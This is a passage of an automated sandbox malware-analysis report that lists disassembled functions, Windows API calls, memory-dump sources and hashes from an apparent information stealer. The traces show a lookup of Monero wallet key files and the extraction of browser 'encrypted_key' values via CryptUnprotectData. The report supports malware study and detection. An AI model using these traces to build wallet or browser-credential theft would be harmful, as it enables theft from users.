                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: ba840bbc01bbde31365793f3def5058cafc17425279a016dea39b572cabd1452
                              • Instruction ID: c611e630df0855522565870bb7ba65a26649e9fe1c87019fdcd08b1889c4ba8a
                              • Opcode Fuzzy Hash: ba840bbc01bbde31365793f3def5058cafc17425279a016dea39b572cabd1452
                              • Instruction Fuzzy Hash: DA0104B5500208FFCB08DFECD988FAE7BB9EB48350F108548F9098B640CA31AA41DB91
                              Function 009E12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009E12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009E12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009E12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009E12F5
                              • RegCloseKey.ADVAPI32(?), ref: 009E12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: bd548097c6c1e85f017480c2602a83255c7ad369a16907291d7411364fda7931
                              • Instruction ID: 57b873a9164fb87cbf991245edd3063a5e5a3feedd96edd5d1579019d637ee73
                              • Opcode Fuzzy Hash: bd548097c6c1e85f017480c2602a83255c7ad369a16907291d7411364fda7931
                              • Instruction Fuzzy Hash: 66011DB9A50208BBDB14DFE0DC49FAEB7B8FB48701F008159FA0597280D6719A018B51
                              Function 009F6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 009F6663
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 009F6726
                              • ExitProcess.KERNEL32 ref: 009F6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 0b370ce0bff0fb3cd535763e995ee7a6801521d2ab89e1e5c6848ada719ef86d
                              • Instruction ID: bdd57626d593f558c7b29ca8930b1255998050f2648821db4820f6f510b73e9f
                              • Opcode Fuzzy Hash: 0b370ce0bff0fb3cd535763e995ee7a6801521d2ab89e1e5c6848ada719ef86d
                              • Instruction Fuzzy Hash: F531FDF1811218ABDB54EB90DC95FEE7778AF44300F404199F30966191DFB46B89CF5A
                              Function 009F87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A00E28,00000000,?), ref: 009F882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F8836
                              • wsprintfA.USER32 ref: 009F8850
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 3bdc3a8c24c914be0f677d6d37b1e20401ff20b706e10bbc1afc3d99d1ab36e8
                              • Instruction ID: 39856c79739bbd84612d761b7fa46b96acc32c66d0b392b0ea564e6560fc7096
                              • Opcode Fuzzy Hash: 3bdc3a8c24c914be0f677d6d37b1e20401ff20b706e10bbc1afc3d99d1ab36e8
                              • Instruction Fuzzy Hash: 95214FB5E50208AFDB14DF94DD49FAEBBB8FB48B01F104119F605A76C0C779A901CBA1
                              Function 009F8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009F951E,00000000), ref: 009F8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F8D62
                              • wsprintfW.USER32 ref: 009F8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 5e0a1ded90bf0a9126d28a232b0d0def58cd64a41befafb06e3887adcc5c3949
                              • Instruction ID: 2aab4c59f68854f644855d119563bce45caeaf873a50a17157e553dcb23bde68
                              • Opcode Fuzzy Hash: 5e0a1ded90bf0a9126d28a232b0d0def58cd64a41befafb06e3887adcc5c3949
                              • Instruction Fuzzy Hash: F1E08CB0A50308BBD720DB94EC0AF6D77B8EB04702F004094FE0987680DA719E018B96
                              Function 009EA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009F8B60: GetSystemTime.KERNEL32(00A00E1A,013B9A98,00A005AE,?,?,009E13F9,?,0000001A,00A00E1A,00000000,?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009F8B86
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009EA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 009EA3FF
                              • lstrlen.KERNEL32(00000000), ref: 009EA6BC
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 009EA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 79e7f86c2e9365a26e993668470722c6dfeab65f6ad53f0e9ecf6c2e668f4d41
                              • Instruction ID: dcbe93bde13449cbde0539d693abdefdcfe9ed9b9e17e34f483688a8e1bafc6f
                              • Opcode Fuzzy Hash: 79e7f86c2e9365a26e993668470722c6dfeab65f6ad53f0e9ecf6c2e668f4d41
                              • Instruction Fuzzy Hash: 89E1D2B281010C9BDB15FBA4DC91FFE7338AF94340F508569F61A720A1EF706A49CB66
                              Function 009ED400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009F8B60: GetSystemTime.KERNEL32(00A00E1A,013B9A98,00A005AE,?,?,009E13F9,?,0000001A,00A00E1A,00000000,?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009F8B86
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009ED481
                              • lstrlen.KERNEL32(00000000), ref: 009ED698
                              • lstrlen.KERNEL32(00000000), ref: 009ED6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 009ED72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 668544f5aa448384b207814a695410dfb5a02091ae44d10905ba54bce18fc9cf
                              • Instruction ID: a1053c2e23305bbbb78cb9df9e4ca4995b701eca00c1c37db78a4662c3434e35
                              • Opcode Fuzzy Hash: 668544f5aa448384b207814a695410dfb5a02091ae44d10905ba54bce18fc9cf
                              • Instruction Fuzzy Hash: 609114B181010C9BCB14FBA0DC92FFE7338AF94340F508568F60BA6091EF746A49CB66
                              Function 009ED780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009F8B60: GetSystemTime.KERNEL32(00A00E1A,013B9A98,00A005AE,?,?,009E13F9,?,0000001A,00A00E1A,00000000,?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009F8B86
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009ED801
                              • lstrlen.KERNEL32(00000000), ref: 009ED99F
                              • lstrlen.KERNEL32(00000000), ref: 009ED9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 009EDA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 9fe95c3d71f1d958a4e695374f5ac630bf1c1cb9a000261340db2f0416381b61
                              • Instruction ID: 8684c4afaa39bb0a77a8fb1ebfcdefa79498c8e7acb47c65fdb7c5e1703429f1
                              • Opcode Fuzzy Hash: 9fe95c3d71f1d958a4e695374f5ac630bf1c1cb9a000261340db2f0416381b61
                              • Instruction Fuzzy Hash: 8D81F2B191010C9BDB14FBA4DC96FFE7339AF94340F504528F60BA60A1EF746A49CB66
                              Function 009F3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 0d84aaeab2d333217847dc39dde6d81664ac83d5622b641043842bec58cdb68c
                              • Instruction ID: 37c6aaacfdc2317d30b0968642f34e111c01db4bbb218ca9f3d64fcf548f7ab1
                              • Opcode Fuzzy Hash: 0d84aaeab2d333217847dc39dde6d81664ac83d5622b641043842bec58cdb68c
                              • Instruction Fuzzy Hash: E5411FB1D1010DEBCB04EFA4D846FFEB778BB54304F10C418E616A6290DB79AA05CFA5
                              Function 009E9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009E99EC
                                • Part of subcall function 009E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009E9A11
                                • Part of subcall function 009E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009E9A31
                                • Part of subcall function 009E99C0: ReadFile.KERNEL32(000000FF,?,00000000,009E148F,00000000), ref: 009E9A5A
                                • Part of subcall function 009E99C0: LocalFree.KERNEL32(009E148F), ref: 009E9A90
                                • Part of subcall function 009E99C0: CloseHandle.KERNEL32(000000FF), ref: 009E9A9A
                                • Part of subcall function 009F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009F8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 009E9D39
                                • Part of subcall function 009E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009E4EEE,00000000,00000000), ref: 009E9AEF
                                • Part of subcall function 009E9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,009E4EEE,00000000,?), ref: 009E9B01
                                • Part of subcall function 009E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009E4EEE,00000000,00000000), ref: 009E9B2A
                                • Part of subcall function 009E9AC0: LocalFree.KERNEL32(?,?,?,?,009E4EEE,00000000,?), ref: 009E9B3F
                                • Part of subcall function 009E9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 009E9B84
                                • Part of subcall function 009E9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 009E9BA3
                                • Part of subcall function 009E9B60: LocalFree.KERNEL32(?), ref: 009E9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
